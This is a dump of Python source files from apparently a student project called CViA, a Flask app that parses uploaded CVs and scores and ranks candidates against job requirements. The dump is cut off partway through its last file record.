"blob_id": "1bff2369fa7cca0bff503dee9159378f34787c61",
"content_id": "773857658fe015461f43c5b3838e21538f459940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 31,
"path": "/cvScorer/Scorer.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass Scorer:\n def __init__(self):\n self.ratio = {}\n\n def set_weight(self, weight):\n ratio_total = 0\n for r in weight:\n ratio_total += weight[r]\n for r in weight:\n self.ratio[r] = weight[r]*1.0/ratio_total\n\n def set_default_weight(self, scored_cv):\n num_field = len(scored_cv['score'])\n for f in scored_cv['score']:\n self.ratio[f] = 1.0/num_field\n\n def cal_score(self, scored_cv):\n total_score = 0\n scores = scored_cv['score']\n for key in scores:\n total_score += scores[key]*self.ratio[key]\n return total_score\n\n def cal_all_score(self, scored_cvs):\n if self.ratio == {}:\n self.set_default_weight(scored_cvs[0])\n for i in range(0, len(scored_cvs)):\n scored_cvs[i]['total'] = self.cal_score(scored_cvs[i])\n return scored_cvs"
},
{
"alpha_fraction": 0.6464646458625793,
"alphanum_fraction": 0.6464646458625793,
"avg_line_length": 25.46666717529297,
"blob_id": "675228d17112526fa759b9f14f25e95db35e81ca",
"content_id": "ea08ae2453f59d0083da7acc712a711bddadef41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 15,
"path": "/cvConverter/DOCFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nfrom subprocess import Popen, PIPE\n\n__author__ = 'siwei'\n\nclass DOCFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"doc\"\n\n def convert(self):\n cmd = ['antiword', self.path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return self.text+stdout.decode('ascii', 'ignore')"
},
{
"alpha_fraction": 0.5726760625839233,
"alphanum_fraction": 0.5784212350845337,
"avg_line_length": 39.6682243347168,
"blob_id": "1664d0ceb246b1213c8cf48de8ea31ef1f2f9502",
"content_id": "a8cf2f1defd4515ff6af4be7c911c8dc9e6dd45f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8703,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 214,
"path": "/cvParser/Parser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import unicodedata\nfrom cvConverter import Converter\nimport ExpParser\nimport LanguageParser\nimport SkillParser\nimport EduParser\nimport VolunteerExpParser\nimport InterestsParser\nimport PublicationsParser\nimport ProjectsParser\nimport CertificationsParser\nimport re\nimport unicodedata\n__author__ = 'haojiang'\n\n\nclass Parser:\n\n def __init__(self):\n self.path = \"\"\n self.summary = \"\"\n self.experience = \"\"\n self.expParser = ExpParser.ExpParser()\n self.publications = \"\"\n self.publicationsParser = PublicationsParser.PublicationsParser()\n self.project = \"\"\n self.projectParser = ProjectsParser.ProjectsParser()\n self.language = \"\"\n self.languageParser = LanguageParser.LanguageParser()\n self.skill = \"\"\n self.skillParser = SkillParser.SkillParser()\n self.education = \"\"\n self.eduParser = EduParser.EduParser()\n self.volunteerexperience=\"\"\n self.volunteerexperienceParser = VolunteerExpParser.VolunteerExpParser()\n self.interest = \"\"\n self.interestParser = InterestsParser.InterestParser()\n self.certifications = \"\"\n self.certificationsParser = CertificationsParser.Certifications()\n self.honors = \"\"\n self.organizations = \"\"\n self.courses = \"\"\n self.i=0\n self.keywords = [\"Summary\",\"Experience\",\"Publications\",\n \"Projects\",\"Languages\",\"Education\",\n \"Skills & Expertise\",\"Volunteer Experience\",\"Certifications\",\n \"Interests\",\"Honors and Awards\",\"Organizations\",\"Courses\"]\n\n def IsKeyWord(self,word):\n return word in self.keywords\n\n def ConstructStr(self,textList):\n result = \"\"\n word = textList[self.i+1]\n while(self.IsKeyWord(word) is False or self.i<len(textList) is False):\n self.i+=1\n if word[:4] !=\"Page\":\n if result is \"\":\n result = result+word\n else:\n result = result+\"\\n\"+word\n if self.i==len(textList)-1:\n break\n else:\n word = textList[self.i+1]\n return result\n\n\n\n def AnalyseText(self,text):\n if isinstance(text, unicode):\n text = unicodedata.normalize('NFKD', text).encode('ascii','ignore')\n textList = text.splitlines()\n\n for i in range(len(textList)-1,0,-1):\n list = textList[i].split()\n if len(list) > 3:\n if list[0] == \"Contact\" and list[len(list)-1] == \"LinkedIn\":\n textList = textList[:i-5]\n break\n\n for i in range(0,len(textList)):\n textList[i] = textList[i].strip() # Trim\n textList = filter(None,textList) # Remove ['']\n self.path = textList[0]\n while (self.i<len(textList)):\n word = textList[self.i]\n if self.IsKeyWord(word):\n if word == 'summary':\n self.summary = self.ConstructStr(textList)\n elif word == 'Experience':\n Expstr = self.ConstructStr(textList)\n self.experience = self.expParser.ParseExp(Expstr)\n #print self.experience\n elif word == 'Publications':\n Publicationsstr = self.ConstructStr(textList)\n self.publications = Publicationsstr\n elif word == 'Certifications':\n Certificationsstr = self.ConstructStr(textList)\n self.certifications = self.certificationsParser.ParseCertifications(Certificationsstr)\n #print self.certifications\n elif word == 'Projects':\n Projectstr = self.ConstructStr(textList)\n self.project = self.projectParser.ParseProjects(Projectstr)\n #print self.project\n elif word == 'Languages':\n Languagestr = self.ConstructStr(textList)\n self.language = self.languageParser.ParseLanguage(Languagestr)\n #print self.language\n elif word == 'Skills & Expertise':\n Skillstr = self.ConstructStr(textList)\n self.skill = self.skillParser.ParseSkill(Skillstr)\n #print self.skill\n elif word == 'Education':\n Edustr = self.ConstructStr(textList)\n self.education = self.eduParser.ParseEdu(Edustr)\n #print self.education\n elif word == 'Volunteer Experience':\n VolunteerExpstr = self.ConstructStr(textList)\n self.volunteerexperience = self.volunteerexperienceParser.ParseVolunteerExp(VolunteerExpstr)\n #print self.volunteerexperience\n elif word == '\\x0cInterests' or word == 'Interests':\n Intereststr = self.ConstructStr(textList)\n self.interest = self.interestParser.ParseInterest(Intereststr)\n #print self.interest\n elif word == \"Honors and Awards\":\n str = self.ConstructStr(textList)\n self.honors = str;\n elif word == \"Organizations\":\n str = self.ConstructStr(textList)\n self.organizations = str\n elif word == \"Courses\":\n str = self.ConstructStr(textList)\n self.courses = str\n self.i = self.i + 1\n\n def convertToObj(self,text):\n self.AnalyseText(text)\n res = self.__dict__.copy()\n self.reset()\n del res[\"i\"]\n del res[\"expParser\"]\n del res[\"skillParser\"]\n del res[\"languageParser\"]\n del res[\"eduParser\"]\n del res[\"publicationsParser\"]\n del res[\"projectParser\"]\n del res[\"certificationsParser\"]\n del res[\"interestParser\"]\n del res[\"volunteerexperienceParser\"]\n del res[\"keywords\"]\n return res\n\n def reset(self):\n self.path = \"\"\n self.summary = \"\"\n self.experience = \"\"\n self.expParser = ExpParser.ExpParser()\n self.publications = \"\"\n self.publicationsParser = PublicationsParser.PublicationsParser()\n self.project = \"\"\n self.projectParser = ProjectsParser.ProjectsParser()\n self.language = \"\"\n self.languageParser = LanguageParser.LanguageParser()\n self.skill = \"\"\n self.skillParser = SkillParser.SkillParser()\n self.education = \"\"\n self.eduParser = EduParser.EduParser()\n self.volunteerexperience=\"\"\n self.volunteerexperienceParser = VolunteerExpParser.VolunteerExpParser()\n self.interest = \"\"\n self.interestParser = InterestsParser.InterestParser()\n self.certifications = \"\"\n self.certificationsParser = CertificationsParser.Certifications()\n self.honors = \"\"\n self.organizations = \"\"\n self.courses = \"\"\n self.i=0\nif __name__ == \"__main__\":\n converter = Converter.DocConverter()\n CV1 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YingxinZhang.pdf\")\n CV2 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YukunDuan.pdf\")\n CV3 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/ZhenNi.pdf\")\n CV4 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/Teck KeongSeow.pdf\")\n CV5 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YimingZhou.pdf\")\n\n P = Parser()\n print P.convertToObj(CV1)\n print P.convertToObj(CV2)\n print P.convertToObj(CV3)\n print P.convertToObj(CV4)\n print P.convertToObj(CV5)\n\n\n\n # result = P.__dict__\n # del result[\"i\"]\n # print result[\"Experience\"].splitlines()\n\n # f = FieldFactory.FieldFacory()\n # edu = f.produceEdu()\n # print edu.__dict__\n # print edu.GetScore()\n # print re.findall(r'(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\\s\\d{4}', \"May 2010 \") !=[]\n # str = 'September 2015 - Present (2 months)'\n # print str.split(\"(\")[0].split(\"-\")[1].split()\n # print str.split(\"(\")[0].split(\"-\")[0].split()\n # print str.split(\"(\")[0].split(\"-\")[1] == \" Present \"\n # first = str.split(\"(\")[0].split(\"-\")[0]\n # second = str.split(\"(\")[0].split(\"-\")[1]\n # print first\n # print second\n # print re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', first) !=[] and \\\n # (re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', second) !=[] or second ==\" Present \")\n"
},
{
"alpha_fraction": 0.650602400302887,
"alphanum_fraction": 0.6580439209938049,
"avg_line_length": 36.62666702270508,
"blob_id": "6a080928c6478c6fb8b9f99193145414b649ca67",
"content_id": "7c55367bdef434a110f2bd045ff4c1421a3ed399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2822,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 75,
"path": "/FieldFactory.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields import EducationField\nfrom CVFields import ExperienceField\nfrom CVFields import LanguageField\nfrom CVFields import Skill_ExpertiseField\nfrom CVFields import VolunteerField\nfrom CVFields import InterestsField\nfrom CVFields import CertificationField\nfrom CVFields import ProjectField\nfrom CVFields import PublicationField\n\nclass FieldFacory:\n def __init__(self):\n pass\n\n def produceEdu(self,university,degree,major):\n return EducationField.EducationField(university,degree,major).__dict__\n\n def produceExp(self,title,period,description,company):\n return ExperienceField.ExperienceField(title,period,description,company).__dict__\n\n def produceLanguage(self,textList):\n return LanguageField.LanguageField(textList).__dict__[\"language\"]\n\n def produceSkill(self,textList):\n return Skill_ExpertiseField.Skill_ExpertiseField(textList).__dict__[\"skill\"]\n\n def produceVolunteerExp(self,title,period,description):\n return VolunteerField.VolunteerExpField(title,period,description).__dict__\n\n def produceInterest(self,textList):\n return InterestsField.InterestsField(textList).__dict__[\"interest\"]\n\n def produceCertifications(self,title,company,license,date):\n return CertificationField.CertificationField(title,company,license,date).__dict__\n\n def produceProjects(self,title,date,description):\n return ProjectField.ProjectField(title,date,description).__dict__\n\n def produce(self,*args):\n fieldName = args[0]\n if fieldName == \"exp\":\n title = args[1]\n period = args[2]\n description = args[3]\n company = args[4]\n return self.produceExp(title,period,description,company)\n elif fieldName == \"edu\":\n university = args[1]\n degree = args[2]\n major = args[3]\n return self.produceEdu(university,degree,major)\n elif fieldName == \"projects\":\n title = args[1]\n date = args[2]\n description = args[3]\n return self.produceProjects(title,date,description)\n elif fieldName == \"language\":\n return self.produceLanguage(args[1])\n elif fieldName == \"skill\":\n return self.produceSkill(args[1])\n elif fieldName == \"volunteerexp\":\n title = args[1]\n period = args[2]\n description = args[3]\n return self.produceVolunteerExp(title,period,description)\n elif fieldName == \"interest\":\n return self.produceInterest(args[1])\n elif fieldName == \"certifications\":\n title = args[1]\n company = args[2]\n license = args[3]\n date = args[4]\n return self.produceCertifications(title,company,license,date)\n"
},
{
"alpha_fraction": 0.4918699264526367,
"alphanum_fraction": 0.4972899854183197,
"avg_line_length": 26.33333396911621,
"blob_id": "89d4da6a5b13736028d379fb8c9551d892a54362",
"content_id": "00f17839795c32afcb9f9bc2e60b006a793191b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 27,
"path": "/cvEvaluator/LangEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass LangEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"language\"\n\n def evaluate(self, req, cv):\n req_lang = req[self.name]\n cv_lang = cv[self.name]\n if req_lang == [] or cv_lang == []:\n return 0\n lang_score = 0\n for pri in req_lang:\n lang_list = req_lang[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n for s in lang_list:\n if s in cv_lang:\n lang_score += base_score\n #self.score = lang_score\n return lang_score\n"
},
{
"alpha_fraction": 0.4641598165035248,
"alphanum_fraction": 0.47003525495529175,
"avg_line_length": 19.780487060546875,
"blob_id": "9e0fa00163e60d16ab2908b6008f48a71699559a",
"content_id": "b92e877783b4f9b19e090bc63352db06d9d9b64c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/cvStore/store.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nimport json\nimport os\n\nclass DataStore:\n\n def __init__(self):\n self.root_dir_path = os.path.dirname(os.path.abspath(__file__)) + '/data/'\n self.load()\n\n def save(self, d):\n with open(self.root_dir_path+'data.json', 'w') as f:\n f.write(unicode(json.dumps(d, ensure_ascii=False)))\n\n def load(self):\n with open(self.root_dir_path+'data.json', 'r') as f:\n self.data = json.loads(f.read())\n\n def printData(self):\n print(json.dumps(self.data))\n print self.data['cv'][0]['name']\n\n\n\nif __name__ == \"__main__\":\n x = DataStore()\n \"\"\"\n x.save( json.loads('''{\n \"cv\": [\n {\n \"name\": \"siwei\",\n \"age\": \"23\"\n },\n {\n \"name\": \"jianghao\",\n \"age\": \"24\"\n }\n ]\n}'''))\"\"\"\n x.printData()"
},
{
"alpha_fraction": 0.7301293611526489,
"alphanum_fraction": 0.7301293611526489,
"avg_line_length": 22.565217971801758,
"blob_id": "756ffcb06692bb7d00c9bd7b5874e0022748c296",
"content_id": "1dfca2a3f23c1929ee7e83bd443bb11a093444ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/test_classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvClassifier.Classifier import Classifier\nfrom cvConverter import Converter\nfrom cvParser.Parser import Parser\nimport os\n\n__author__ = 'siwei'\n\nroot_dir_path = os.path.dirname(os.path.abspath(__file__))\n\nconverter = Converter.DocConverter()\nparser = Parser()\n\ncl = Classifier()\ncl.load()\n\nto_classify = [\"cv/simple.doc\"]\nclassified_cv = []\nfor cv in to_classify:\n CV_Text = converter.documentToText(root_dir_path+\"/\"+cv)\n cvobj = parser.convertToObj(CV_Text)\n classified_cv.append((cv, cl.classify(cvobj)))\n\nprint classified_cv"
},
{
"alpha_fraction": 0.5581565499305725,
"alphanum_fraction": 0.5620580315589905,
"avg_line_length": 31.291337966918945,
"blob_id": "20fa6155793430452cd198317cc5bbbc66a0f38f",
"content_id": "f02911b575e56a233128dcd2fffa1f07bc61a8bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4101,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 127,
"path": "/main.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom flask import Flask, render_template, request, send_from_directory\nfrom werkzeug import secure_filename\n\nfrom doc_converter import DocConverter\nfrom cvParser.Parser import Parser\nimport Service\nfrom Service import input_requirement, evaluate_cvs, input_weight, input_job_function\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'cv/'\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'doc', 'docx'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\ndef get_cvs():\n files = os.listdir(os.path.join(app.config['UPLOAD_FOLDER']))\n allowed_files = []\n for filename in files:\n if allowed_file(filename):\n allowed_files.append(app.config['UPLOAD_FOLDER'] + filename)\n return allowed_files\n\[email protected](\"/\", methods=['GET'])\ndef index():\n return render_template('index.html')\n\[email protected](\"/upload\", methods=['GET', 'POST'])\ndef upload():\n # POST\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n print \"Uploaded file\", filename\n\n full_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n print full_path\n file.save(full_path)\n print \"Stored file\", filename\n\n return render_template(\n 'cv.html',\n filename=filename\n )\n\n return render_template('cv.html', filename=None)\n\n # GET\n return render_template('upload.html')\n\[email protected]('/upload/<filename>', methods=['GET'])\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\[email protected]('/upload/all', methods=['GET'])\ndef all_cvs():\n cvs = get_cvs()\n return render_template('cvs.html', cvs=[cv.split('/')[-1] for cv in cvs])\n\[email protected]('/process', methods=['POST'])\ndef process():\n # POST\n if request.method == 'POST':\n def parse(text):\n keywords = []\n for keyword in text.split(','):\n if keyword.strip():\n keywords.append(str(keyword.strip()))\n return keywords\n\n def parse_number(text):\n try:\n number = int(text)\n return number if number >= 1 else 1\n except e:\n return 1\n\n req = {\n 'education': request.form['education'],\n 'skill': {\n 'must': parse(request.form['skill_must']),\n 'good': parse(request.form['skill_good'])\n },\n 'language': {\n 'must': parse(request.form['language_must']),\n 'good': parse(request.form['language_good'])\n },\n 'experience': {\n 'must': parse(request.form['experience_must']),\n 'good': parse(request.form['experience_good'])\n },\n 'other': parse(request.form['other'])\n }\n\n weights = {\n 'education': parse_number(request.form['education_weight']),\n 'skill': parse_number(request.form['skill_weight']),\n 'language': parse_number(request.form['language_weight']),\n 'experience': parse_number(request.form['experience_weight']),\n 'other': parse_number(request.form['other_weight'])\n }\n\n cvs = get_cvs()\n\n input_requirement(req)\n input_weight(weights)\n input_job_function(request.form['job'])\n results = evaluate_cvs(cvs)\n for cv in results:\n detailed_scores = \"\"\n for category in cv['score']:\n detailed_scores += category + \": \" + str(cv['score'][category]) + \"\\n\"\n cv['detailed_scores'] = detailed_scores\n cv['filename'] = cv['cv'].split('/')[-1]\n cv['total'] = round(cv['total'], 1)\n\n results.sort(key=lambda x: -x['total'])\n\n return render_template('result.html', cvs=results)\n\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8888)\n"
},
{
"alpha_fraction": 0.6818181872367859,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 18.375,
"blob_id": "b3debf441ca7b2af78114215ac77b06f27f72892",
"content_id": "27e0fd78d841dff5863f7b56c212299706cc6969",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/CVFields/InterestsField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass InterestsField(Field):\n\n def __init__(self,textlist):\n self.interest = textlist"
},
{
"alpha_fraction": 0.6793830990791321,
"alphanum_fraction": 0.6801947951316833,
"avg_line_length": 33.22222137451172,
"blob_id": "bd1f7ccfcf4ff8203d759565506792a8d5d79cca",
"content_id": "42fbd2e46357bc839c738f4ab887a24a529be085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 36,
"path": "/cvConverter/Converter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.DOCFileConverter import DOCFileConverter\nfrom cvConverter.DOCXFileConverter import DOCXFileConverter\nfrom cvConverter.PDFFileConverter import PDFFileConverter\nfrom cvConverter.TXTFileConveryer import TXTFileConverter\n\n__author__ = 'siwei'\n\nclass DocConverter:\n def __init__(self):\n self.converters = []\n self.add_converters()\n\n def add_converters(self):\n doc_converter = DOCFileConverter()\n self.converters.append(doc_converter)\n docx_converter = DOCXFileConverter()\n self.converters.append(docx_converter)\n txt_converter = TXTFileConverter()\n self.converters.append(txt_converter)\n pdf_converter = PDFFileConverter()\n self.converters.append(pdf_converter)\n\n def get_extension(self, file_name):\n return file_name.split('.')[-1]\n\n def documentToText(self, file_name):\n extension = self.get_extension(file_name)\n for converter in self.converters:\n if converter.get_type() == extension:\n converter.set_path(file_name)\n return converter.convert()\n\nif __name__ == \"__main__\":\n\n x = DocConverter()\n print x.documentToText(\"/Volumes/D/CViA/cv/LinkedIn/YaminiBhaskar.pdf\")\n"
},
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6772152185440063,
"avg_line_length": 16.66666603088379,
"blob_id": "705130ecc14ba8ea9ed03ebc6c6472c78c4008fe",
"content_id": "56b97ead029c493b81235e0d3f461563c65bce42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 9,
"path": "/CVFields/Skill_ExpertiseField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass Skill_ExpertiseField(Field):\n\n def __init__(self,textlist):\n self.skill = textlist"
},
{
"alpha_fraction": 0.6238095164299011,
"alphanum_fraction": 0.6238095164299011,
"avg_line_length": 18.090909957885742,
"blob_id": "0c1c3c5e460e097cb509b2801545da43c4fb232d",
"content_id": "fda3ee857e57fe681795a5f01aad5dd7d894eac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/CVFields/ProjectField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass ProjectField(Field):\n\n def __init__(self,title,date,des):\n self.title = title\n self.date = date\n self.description = des\n"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7659574747085571,
"avg_line_length": 14.833333015441895,
"blob_id": "75f3759202a7cf3f844db8926e6936ecd4e551d5",
"content_id": "af95df17d0346b55c2e3858e552db9867f9876dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/CVFields/PublicationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass PublicationField(Field):pass"
},
{
"alpha_fraction": 0.45967450737953186,
"alphanum_fraction": 0.4781193435192108,
"avg_line_length": 40.89393997192383,
"blob_id": "5a97add78a5d326e108bbe27335317a465123e84",
"content_id": "0de3259099a83890427a661eb2fd86f9bb3afd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 66,
"path": "/cvParser/ExpParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "\nimport re\nimport FieldFactory\n\n__author__ = 'haojiang'\n\n\nclass ExpParser:\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseExp(self,ExpStr):\n ExpList = ExpStr.splitlines()\n dateArr = []\n result = []\n for i in range(0,len(ExpList)):\n if self.MatchExpDate(ExpList[i]):\n dateArr.append(i)\n for i in range(0,len(dateArr)):\n index = dateArr[i]\n if i != len(dateArr)-1:\n if(len(ExpList[index-1].split(\" at \")) == 2):\n title = ExpList[index-1].split(\" at \")[0].strip()\n company = ExpList[index-1].split(\" at \")[1].strip()\n else:\n title = ExpList[index-1]\n company = \"\"\n period = ExpList[index].split(\"(\")[1][:len(ExpList[index].split(\"(\")[1])-1]\n description = \"\"\n\n ### Not EMPTY description ###\n if index+1 != dateArr[i+1]-1:\n temp = index+1\n end = dateArr[i+1]-1\n while(temp!=end):\n description = description + ExpList[temp]\n temp+=1\n\n else:\n if(len(ExpList[index-1].split(\" at \")) == 2):\n title = ExpList[index-1].split(\" at \")[0].strip()\n company = ExpList[index-1].split(\" at \")[1].strip()\n else:\n title = ExpList[index-1]\n company = \"\"\n period = ExpList[index].split(\"(\")[1][:len(ExpList[index].split(\"(\")[1])-1]\n description =\"\"\n\n ### Not EMPTY description\n if index+1 != len(ExpList):\n temp=index+1\n end = len(ExpList)\n while(temp!=end):\n description = description + ExpList[temp]\n temp+=1\n result.append(self.factory.produce(\"exp\",title,period,description,company))\n return result\n\n def MatchExpDate(self,text): # <--- Check whether the string is a date string\n if len(text.split(\"(\"))>1 and len(text)<50 and \"-\" in text:\n # From \" May 2013 - May 2015 (2 years)\" extract date.\n first = text.split(\"(\")[0].split(\"-\")[0].strip()\n second = text.split(\"(\")[0].split(\"-\")[1].strip()\n return re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', first) !=[] and \\\n (re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', second) !=[] or second ==\"Present\")\n else:\n return False"
},
{
"alpha_fraction": 0.6143141388893127,
"alphanum_fraction": 0.6163021922111511,
"avg_line_length": 26.88888931274414,
"blob_id": "0aaf4e89c513a0571140ac26fe0bc25c33c2e560",
"content_id": "018ca1fd92d8578770b35e19df14739a02195faa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/cvParser/LanguageParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import LanguageField\n__author__ = 'haojiang'\n\n\n\nclass LanguageParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseLanguage(self,text):\n textList = text.splitlines()\n for i in range(0,len(textList)):\n if \" \" in textList[i] or \"(\" in textList[i] or \")\" in textList[i]:\n textList[i] = \"\"\n textList = filter(None,textList)\n return self.factory.produce(\"language\",textList)\n\n"
},
{
"alpha_fraction": 0.523809552192688,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 20,
"blob_id": "3b719e51cb5f16a3a50815ecdbc1f28b68d0c18f",
"content_id": "47db59d4c4e070aa2b97675b460cf0977d393e15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/cvStore/__init__.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n"
},
{
"alpha_fraction": 0.48172515630722046,
"alphanum_fraction": 0.49049708247184753,
"avg_line_length": 31.595237731933594,
"blob_id": "842bfebe470e6a5634c936dfd562ee881d2deb82",
"content_id": "8d82ebb658bf99b0b6981ae8763742d4ced50549",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 42,
"path": "/cvParser/ProjectsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\nclass ProjectsParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseProjects(self,text):\n textList = text.splitlines()\n keyIndex = []\n result = []\n for i in range(0,len(textList)):\n if \"Members:\" in textList[i]:\n keyIndex.append(i)\n\n for i in range(0,len(keyIndex)):\n theIndex = keyIndex[i]\n\n # Is not the last one\n if i != len(keyIndex) - 1:\n title = textList[theIndex-2]\n date = textList[theIndex-1]\n description = \"\"\n start = theIndex + 1\n end = keyIndex[i+1]\n for k in range(start,end):\n description = description + textList[k]\n # Is the last one\n else:\n title = textList[theIndex-2]\n date = textList[theIndex-1]\n description = \"\"\n if theIndex + 1 < len(textList):\n start = theIndex + 1\n end = len(textList) - 1\n for k in range(start,end):\n description = description + textList[k]\n\n result.append(self.factory.produce(\"projects\",title.strip(),date.strip(),description.strip()))\n\n return result"
},
{
"alpha_fraction": 0.4776119291782379,
"alphanum_fraction": 0.48187634348869324,
"avg_line_length": 29.29032325744629,
"blob_id": "1bb77e50832bbcf80ea5398f81572b2faf8d2420",
"content_id": "94e57359e3987c8977fb5f58e548165395acc6ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/cvEvaluator/SkillEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
